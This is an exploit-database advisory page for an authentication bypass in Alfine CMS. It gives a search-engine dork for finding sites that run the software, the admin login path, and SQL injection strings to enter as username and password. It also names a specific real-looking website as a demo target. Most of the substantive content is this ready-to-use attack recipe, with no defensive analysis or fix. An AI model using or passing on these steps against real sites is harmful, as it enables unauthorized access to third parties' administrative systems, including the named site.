Alfine CMS Admin Page Bypass

2016.06.26
Credit: mr_mask_black
Risk: Medium
Local: No
Remote: Yes
CVE: N/A
CWE: CWE-89
Dork: intext:"Developed by ALFiNE IT Solutions"

###################### # Exploit Title : Alfine CMS Admin Page Bypass # Exploit Author : mr_mask_black # Vendor Homepage : http://alfinesolutions.com # Google Dork : intext:"Developed by ALFiNE IT Solutions" # Date: 2016/6/26 # Tested On : win 7 # Contact:mr_mask_black@yahoo.com ###################### # Vulnerable File : index.php # Describe : Search dork and select Target. Put admin/index.php After url such as : # http://site.com/admin/index.php # Now enter fill Gebruikersnaam(username) and Wachtwoord(Password) like the information below : # Username: '=' 'OR' # Password: '=' 'OR' # # OK :) # # Demo : # http://www.otbt.in/admin/index.php # # # ###################### # discovered by : mr_mask_black ###################### # thanks to :| sir.hamid || king of peace || p[E]ym[A]n | mahyar | kian error | king dawn | and all friends ... ######################


See this note in RAW Version
Vote for this issue:
50%
50%


 

Thanks for you vote!


 

Thanks for you comment!
Your message is in quarantine 48 hours.

Comment it here.


(*) - required fields.  
{{ x.nick }} | Date: {{ x.ux * 1000 | date:'yyyy-MM-dd' }} {{ x.ux * 1000 | date:'HH:mm' }} CET+1
{{ x.comment }}
Copyright 2024, cxsecurity.com

 

Back to Top